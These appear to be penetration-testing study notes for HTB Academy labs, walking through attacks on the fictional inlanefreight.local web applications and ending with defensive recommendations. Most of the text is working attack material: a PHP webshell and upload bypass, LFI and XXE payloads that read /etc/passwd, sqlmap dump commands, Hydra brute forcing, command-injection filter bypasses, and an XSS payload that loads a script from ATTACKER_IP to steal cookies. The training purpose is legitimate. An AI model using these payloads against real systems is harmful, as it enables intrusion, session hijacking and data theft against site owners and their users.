πWeb Enumeration & Exploitation
π― Overview
Web applications present the largest attack surface during External Penetration Tests. Focus on high-risk vulnerabilities (RCE, data exposure) rather than minor issues. Use EyeWitness for efficient application discovery and systematic testing of each discovered service.
π Web Application Discovery
π EyeWitness Automation
# Subdomain list preparation
cat > ilfreight_subdomains << EOF
inlanefreight.local
blog.inlanefreight.local
careers.inlanefreight.local
dev.inlanefreight.local
gitlab.inlanefreight.local
ir.inlanefreight.local
status.inlanefreight.local
support.inlanefreight.local
tracking.inlanefreight.local
vpn.inlanefreight.local
monitoring.inlanefreight.local
EOF
# Automated screenshot capture
eyewitness -f ilfreight_subdomains -d ILFREIGHT_subdomain_EyeWitnessπ Application-by-Application Analysis
π blog.inlanefreight.local - Drupal 9
# Version detection
curl -s http://blog.inlanefreight.local | grep Drupal
# Output: Drupal 9 (current stable)
# Assessment result:
- No Drupalgeddon vulnerabilities (9.x not affected)
- Admin authentication unsuccessful
- User registration disabled
- Recommendation: Remove unused test siteπΌ careers.inlanefreight.local - Job Portal
# Key findings:
- User registration enabled
- File upload functionality (any file type)
- IDOR vulnerability in profile access
# IDOR exploitation:
http://careers.inlanefreight.local/profile?id=1 # Access other users
http://careers.inlanefreight.local/profile?id=2 # Sensitive data exposure
http://careers.inlanefreight.local/profile?id=3 # Job application detailsπ§ dev.inlanefreight.local - Key Vault
# Directory enumeration
gobuster dir -u http://dev.inlanefreight.local -w /usr/share/wordlists/dirb/common.txt -x .php -t 300
# Key discoveries:
/uploads/ # Directory listing enabled
/upload.php # HTTP 403 but responds with 200
# HTTP Verb Tampering exploitation:
TRACK /upload.php HTTP/1.1
Host: dev.inlanefreight.local
X-Custom-IP-Authorization: 127.0.0.1
# Result: File upload form revealedπΊ Unrestricted File Upload Chain
# 1. Create PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# 2. Upload with Content-Type bypass
Content-Type: image/png # Instead of application/x-php
# 3. Command execution
curl "http://dev.inlanefreight.local/uploads/shell.php?cmd=id"
# Output: uid=33(www-data) gid=33(www-data)π° ir.inlanefreight.local - WordPress
# WPScan enumeration
wpscan -e ap -t 500 --url http://ir.inlanefreight.local
# Key findings:
- WordPress 6.0 (latest)
- mail-masta plugin (vulnerable to LFI)
- Users: ilfreightwp, tom, james, john
# LFI exploitation (Mail Masta plugin):
curl "http://ir.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
# Password brute force:
wpscan --url http://ir.inlanefreight.local -P passwords.txt -U ilfreightwp
# Result: ilfreightwp:password1
# WordPress admin access β Theme editor β PHP shell injectionπ status.inlanefreight.local - Log Search
# SQL injection discovery
Input: '
Error: "MySQL syntax error near '%'' at line 1"
# Manual UNION attack:
' union select null, database(), user(), @@version -- //
# SQLMap exploitation:
sqlmap -r sqli.txt --dbms=mysql --dbs
sqlmap -r sqli.txt --dbms=mysql -D status --tables
sqlmap -r sqli.txt --dbms=mysql -D status -T users --dumpπ« support.inlanefreight.local - IT Support Portal
# XSS testing in ticket submission
Payload: "><script src=http://ATTACKER_IP:9000/TESTING_THIS></script>
# Blind XSS confirmation
nc -lvnp 9000
# Result: Connection from target with User-Agent: HTBXSS/1.0
# Cookie stealing setup:
# index.php - cookie logger
# script.js - cookie exfiltration payload
# Session hijacking result:
# Admin session cookie captured β Dashboard accessπ¦ tracking.inlanefreight.local - PDF Generator
# HTML injection testing
Input: <h1>test</h1>
Result: Rendered in PDF tracking field
# SSRF to Local File Read
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");
x.send();
</script>
# Result: Local file contents displayed in generated PDFπ vpn.inlanefreight.local - Fortinet SSL VPN
# Assessment result:
- Current version (no known CVEs)
- Common credentials unsuccessful
- Potential password spraying target
- Access denied error messageπ¦ gitlab.inlanefreight.local - GitLab Instance
# Misconfiguration assessment:
- User registration enabled (no admin approval)
- Public project access available
- shopdev2.inlanefreight.local project discovered
# Security issues:
- No domain restrictions on registration
- Sensitive project exposure
- Development environment discoveryπ shopdev2.inlanefreight.local - Shopping Cart
# Authentication testing:
admin:admin # Successful login (weak credentials)
# XXE vulnerability in checkout process:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE userid [
<!ENTITY xxetest SYSTEM "file:///etc/passwd">
]>
<root>
<subtotal>undefined</subtotal>
<userid>&xxetest;</userid>
</root>
# Result: Local file read capabilityπ monitoring.inlanefreight.local - Monitoring Console
# Authentication brute force:
hydra -l admin -P passwords.txt monitoring.inlanefreight.local http-post-form "/login.php:username=admin&password=^PASS^:Invalid Credentials!"
# Result: admin:12qwaszx
# Restricted shell analysis:
Available commands: ls, cat, whoami, date, help, clear, reboot, cd, mv, rm, rmdir, touch, connection_test
# Command injection in connection_test:
GET /ping.php?ip=127.0.0.1%0a'i'd
# Bypass: %0a (newline) + single quotes around commands
# Filter analysis:
Blocked: &, |, ;, \, /, space, whoami, echo, rm, etc.
Bypass: ${IFS} for spaces, %0a for command separation
# Network discovery:
IP addresses: 10.129.203.101 (external), 172.16.8.120 (internal)
# Pivot opportunity into internal networkπ― Key Vulnerabilities Discovered
π΄ High Risk Findings
1. Unrestricted File Upload (dev.inlanefreight.local)
2. HTTP Verb Tampering (dev.inlanefreight.local)
3. Local File Inclusion (ir.inlanefreight.local)
4. Weak WordPress Credentials (ir.inlanefreight.local)
5. SQL Injection (status.inlanefreight.local)
6. Cross-Site Scripting (support.inlanefreight.local)
7. SSRF to Local File Read (tracking.inlanefreight.local)
8. Misconfigured GitLab Instance (gitlab.inlanefreight.local)
9. XML External Entity Injection (shopdev2.inlanefreight.local)
10. Command Injection (monitoring.inlanefreight.local)
11. Weak Authentication (multiple applications)π‘ Medium Risk Findings
1. Directory Listing Enabled (dev.inlanefreight.local)
2. IDOR - User Profile Access (careers.inlanefreight.local)
3. Abandoned Test Applications (blog.inlanefreight.local)π Attack Chain Summary
π― External β Internal Pivot Path
# 1. External reconnaissance
Nmap scans β Service discovery β Subdomain enumeration
# 2. Web application testing
EyeWitness β Individual app analysis β Vulnerability discovery
# 3. Initial foothold options:
- PHP webshell via file upload (dev.inlanefreight.local)
- WordPress theme editor (ir.inlanefreight.local)
- Command injection (monitoring.inlanefreight.local)
# 4. Internal network access:
monitoring.inlanefreight.local β 172.16.8.120 interface
β Pivot into internal AD environmentπ§ Tools & Techniques Used
π Web Enumeration
# Application discovery
eyewitness -f subdomain_list -d output_dir
# Directory brute forcing
gobuster dir -u TARGET -w wordlist -x .php -t 300
# WordPress enumeration
wpscan -e ap,u -t 500 --url TARGET
# Password brute forcing
hydra -l admin -P wordlist TARGET http-post-form "PATH:PARAMS:FAIL_STRING"βοΈ Exploitation Techniques
# File upload bypass
Content-Type: image/png # MIME type manipulation
# SQL injection
sqlmap -r request.txt --dbms=mysql --dump -D database -T table
# XSS cookie stealing
<script src=http://ATTACKER/script.js></script>
# XXE local file read
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# Command injection bypass
%0a'command' # Newline + single quotes
${IFS} # Space bypass using environment variableπ― HTB Academy Labs
π Lab Solutions Summary
Lab 1: IDOR vulnerability β Profile enumeration β Flag discovery
Lab 2: HTTP verb tampering β File upload β Webshell execution
Lab 3: WordPress exploitation β Theme editor β Reverse shell
Lab 4: SQL injection β Database enumeration β User password extraction
Lab 5: XSS exploitation β Cookie stealing β Session hijacking
Lab 6: SSRF vulnerability β Local file read β Flag extraction
Lab 7: GitLab registration β Project access β Flag discovery
Lab 8: XXE injection β XML manipulation β File system access
Lab 9: Authentication brute force β Command injection β Flag retrievalπ Key Learning Points
# Professional approach:
- Systematic application testing
- Evidence collection for each finding
- Business impact assessment
- Remediation priority guidance
# Technical skills:
- Multi-vector exploitation chains
- Filter bypass techniques
- Session management attacks
- Local file read escalation
# Real-world scenarios:
- Weak credential prevalence
- Development environment exposure
- Misconfigured public services
- Internal network pivot opportunitiesπ‘οΈ Defensive Recommendations
π Application Security
# Input validation:
- Implement proper input sanitization
- Use parameterized queries (SQL injection prevention)
- Validate file uploads (type, size, content)
- Escape user output (XSS prevention)
# Authentication security:
- Enforce strong password policies
- Implement account lockout mechanisms
- Use multi-factor authentication
- Regular credential audits
# Configuration hardening:
- Remove test/development applications
- Disable unnecessary HTTP methods
- Configure proper error handling
- Implement security headersLast updated